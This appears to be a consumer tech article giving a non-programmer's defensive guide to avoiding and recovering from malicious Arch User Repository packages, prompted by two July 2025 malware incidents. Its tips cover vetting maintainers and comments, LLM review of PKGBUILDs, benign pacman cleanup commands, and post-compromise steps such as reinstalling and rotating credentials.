Quick Links Understanding What Makes Arch Vulnerable How I Stay Safe From Malware in the AUR — as a Non-Programmer What to Do if Your Arch System Is Compromised
Do you want to try Arch Linux, but feel scared because of the recent malware incident? Are you a current Arch user wondering how to keep your system safe and secure? Well, I have been using the Linux distro for five years now, and here’s my complete guide on staying safe on Arch Linux.
Understanding What Makes Arch Vulnerable
July 2025 was not a great month for Arch Linux — the distribution faced two notable malware incidents, both delivered through compromised packages in the Arch User Repository (AUR). On July 16, 2025, three AUR packages — librewolf-fix-bin, firefox-patch-bin, and zen-browser-patched-bin — were found to contain the CHAOS RAT (Remote Access Trojan), as reported by Linux Security. A second incident, reported by Linuxiac, occurred on July 31, 2025, when a re-uploaded google-chrome-stable package appeared in the AUR. This package’s build script included a Python one-liner that fetched and executed a remote script from an untrusted server.
Thankfully, AUR users quickly noticed something was wrong, and the malicious packages were removed from the AUR within 48 hours in both instances. That said, these are not isolated events. In the past, there have been multiple such incidents where bad actors tried to use the AUR to spread malware across various systems.
So does this make the AUR, and in turn Arch Linux, unsafe and risky? Well, the answer is more complicated than a simple yes or no!
Why Is There Malware in the AUR?
The Arch User Repository is a massive, community-driven library of software for Arch Linux. Unlike the official repositories, where every package is reviewed and signed off by Arch developers, the AUR is almost entirely open — anyone can freely submit a new package, and everyone can instantly install it. Furthermore, if the original maintainer abandons their package, another person can become its new maintainer and start pushing updates.
Because of this flexibility and openness, the AUR is home to tens of thousands of bleeding-edge apps and obscure utilities. It’s why people love AUR and use it. However, this model also introduces its own share of security risks.
Since there is no formal code review process and new AUR packages can go live almost instantly, bad actors can use the platform to quickly distribute malware. This won’t infect your system unless you actively choose to install it. However, someone can become the new maintainer of an abandoned package and slip in malicious code into it and that’ll infect your system as soon as you update that package.
In a poetic fashion, the same openness and speed that makes AUR so powerful is also what makes it vulnerable. That said, the AUR can be safe if you make it safe. The AUR community expects that you will read PKGBUILD files, and check the package’s history and comments, before installing AUR packages on your system. If you don’t do your due diligence, then yes, you risk infecting your Arch system with malware!
How I Stay Safe From Malware in the AUR — as a Non-Programmer
I am not a programmer and I don’t know how to read code! That said, I’ve been using Arch-based systems for about five years now. I started off with Manjaro and eventually switched over to Garuda Linux, which is my current daily driver. I’ve found that most of the apps I actually need are available directly in the official repositories or via Flatpaks. I only use the AUR for testing out some niche or quirky apps.
As such, most people, especially newcomers, can entirely avoid the AUR and not bother with the associated security issues. However, if you do need to install an app from the AUR, you can follow my personal safety tips.
Take Regular System Backups
First and foremost, no matter if you’re using something insecure and unstable like Windows or robust like Debian, you should always back up your system — and this goes for Arch as well! You can check out our guide on using rsync for system backup as I find it the best option.
Also, remember to store the backup files on a separate device that’s not always attached to the same system, or else you risk corrupting the backup files if and when the system gets compromised.
Crucial X10 Portable SSD $100 $120 Save $20 9 / 10 Storage capacity 1TB, 2TB, 4TB, 6TB, 8TB Hardware Interface USB-C 3.2 Gen 2×2 Brand Crucial
Need a backup location? The Crucial X10 Portable SSD features read speeds of up to 2,100MB/s using its USB-C 3.2 Gen 2×2 interface. With a drop rating of 9.8 feet and IP65 water- and dust-resistance, this drive is ready for whatever you can throw at it. Plus, it comes in storage capacities ranging from 1TB up to 8TB.
Transfer rate 2,100MB/s Dimensions 2.53 x 1.93 x 0.37 inches Weight 37.9 grams $100 at bhphotovideo $100 at Best Buy Expand Collapse Stay Informed: Subscribe and Watch for Security Alerts
I personally have Google Alerts set up for the keywords Arch and AUR. This way I get a daily email with all the latest news on those two topics. On top of that, I also subscribe to r/archlinux and r/linux subreddits. These channels often report security vulnerabilities, pulled packages, or new malware campaigns — sometimes even before the news hits bigger tech sites.
Use Octopi for Installing AUR Packages
While most Arch users would prefer the terminal, I generally use Octopi — a graphical package manager for installing apps and packages on my Garuda PC. As soon as I type in the name of the package I’m looking for, it’ll list all relevant options including which repository is hosting it. There’s also an info tab which shows useful metadata about the package, including who maintains the package and the official project URL.
This saves me a trip to the AUR website as I can quickly check if an app or package is trustable. I generally trust packagers with either the distro’s or archlinux.org domain name. If it’s something generic like XYZ (didn’t share email) or [email protected], it’s time to visit its AUR website and investigate a bit more before hitting install!
Check Package Maintainer, Comments, and Change Log
When investigating a package in the AUR, I primarily focus on the maintainer or packager. You can usually click on the name to view all the packages that person is maintaining. Alternatively, they might have the upstream URL pointing to their GitHub page, from where I can learn more about that person.
I always prefer packages that have been maintained by someone with a long history in the Arch or broader Linux community. If the maintainer is new, hasn’t updated the package in a while, or has suddenly taken over an orphaned package, that’s a potential red flag for me.
Next, I check the comments section. If it’s empty or has a lot of complaints, I generally avoid the package. I feel more confident when there is an active conversation happening, and the maintainer is replying to commenters.
Finally, I check the change log to get an idea of when the package was first added to the AUR and who has been maintaining it. My vote of confidence goes to packages where the current maintainer has been involved with it for at least one month, ideally six months!
Scan the PKGBUILD With an LLM
One of the biggest advantages of the AUR is that every package’s build script — called the PKGBUILD — is open for anyone to inspect. This makes it relatively easy to spot if there’s anything fishy going on, but only if you know how to read code. Since I’m not a programmer, I started to resort to large language models (LLMs) to do the job for me.
Whenever I’m even slightly suspicious about a package, I copy the entire PKGBUILD file from the AUR page and paste it into Google AI Studio. It’s free to use and gives you access to Gemini 2.5 Pro — a fairly capable model when it comes to reading and understanding code. I ask it to check the PKGBUILD file and tell me if there is anything to worry about.
LLMs aren’t foolproof, and they can hallucinate or make up false data. As such, you shouldn’t blindly trust what they say. I just use them as an additional security check, and I’d consult a real expert if they flag anything.
Routinely Delete Orphaned Packages from Your System
Packages are considered orphaned if they were once needed as a dependency for a particular tool you run, but they’re not currently being used by any installed app. This makes them redundant pieces of software that not only take up space on your PC but also increase your threat profile — especially if they’re from the AUR.
That’s why I make it a habit to routinely (once a month) check all my orphaned packages and delete the ones I know I will never use. To see all orphaned dependencies on your system, you can enter the following command:
pacman -Qdt
If you see packages you know you won’t need, you can delete them using:
sudo pacman -Rns
Alternatively, you can also use the following command (enter as is, including the parenthesis) to delete all orphaned dependencies from your system:
sudo pacman -Rns $(pacman -Qdtq) What to Do if Your Arch System Is Compromised
Let’s say you start using the AUR and you hear news about some malware plaguing the repository. In that case, the first thing you should do is check if you have that malicious package installed on your system. To do this, simply open the terminal and type the following command:
pacman -Qs
Alternatively, you can also type this command to see all AUR packages installed on your system:
pacman -Qm
In fact, if this is your first time focusing on the security of your Arch distro, I’d recommend using the above command to get a list of all installed AUR packages and then going through each one of them to find out if any of them have a high threat level. If yes, just remove them and find a replacement. There’s no need to gamble with the security of your system.
Now, let’s say you have found the malicious package on your system. In that case, disconnect from the internet immediately. This will prevent the malware from downloading or uploading any more data. Now delete the package by running the command:
sudo pacman -Rns
Next, turn off your system and use a bootable Linux USB stick to boot into a live Linux environment. From there, use antivirus software like ClamAV or chkrootkit to scan and delete any additional malware that might’ve been left behind on your system.
That said, I personally dislike taking any risk and generally would wipe and reinstall the OS if it was compromised. I realize that this might not be a favorable option for some, especially if you have important files stored on your PC. However, if it’s an option you can consider, then I’d highly encourage it.
Also, it’s usually wise to assume your passwords and SSH keys were compromised in the incident. As such, don’t forget to change all your passwords and generate new SSH keys. Prioritize your important accounts first, like your primary email and banking accounts, and work your way down.
There you have it — a quick and effective set of Arch Linux security basics that I personally follow to keep myself safe from malware on Arch Linux. As you can see, with a few good habits and a little extra vigilance, you’re able to minimize the downside and enjoy everything Arch has to offer without potential security issues!
